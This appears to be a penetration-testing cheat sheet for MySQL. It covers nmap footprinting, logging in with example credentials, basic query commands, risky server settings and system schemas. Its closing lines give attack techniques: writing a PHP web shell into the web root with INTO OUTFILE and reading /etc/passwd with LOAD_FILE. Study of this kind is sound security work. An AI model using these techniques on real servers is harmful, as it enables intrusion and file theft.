My Structured Query Language
Last updated
Footprinting The Service
sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*
Interaction with the MySQL Server
mysql -u root -pP4SSw0rd -h 10.129.14.128
Commands
Command
Description
mysql -u <user> -p<password> -h <IP address>
Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.
show databases;
Show all databases.
use <database>;
Select one of the existing databases.
show tables;
Show all available tables in the selected database.
show columns from <table>;
Show all columns in the selected database.
select * from <table>;
Show everything in the desired table.
Dangerous Settings
user
Sets which user the MySQL service will run as.
password
Sets the password for the MySQL user.
admin_address
The IP address on which to listen for TCP/IP connections on the administrative network interface.
debug
This variable indicates the current debugging settings
sql_warnings
This variable controls whether single-row INSERT statements produce an information string if warnings occur.
secure_file_priv
This variable is used to limit the effect of data import and export operations.
MySQL default system schemas/databases:
mysql- is the system database that contains tables that store information required by the MySQL serverinformation_schema- provides access to database metadataperformance_schema- is a feature for monitoring MySQL Server execution at a low levelsys- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';File Write Privileges
show variables like "secure_file_priv";secure_file_priv variable is empty, which means we can read and write data using MySQLRead Local File
select LOAD_FILE("/etc/passwd");MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files
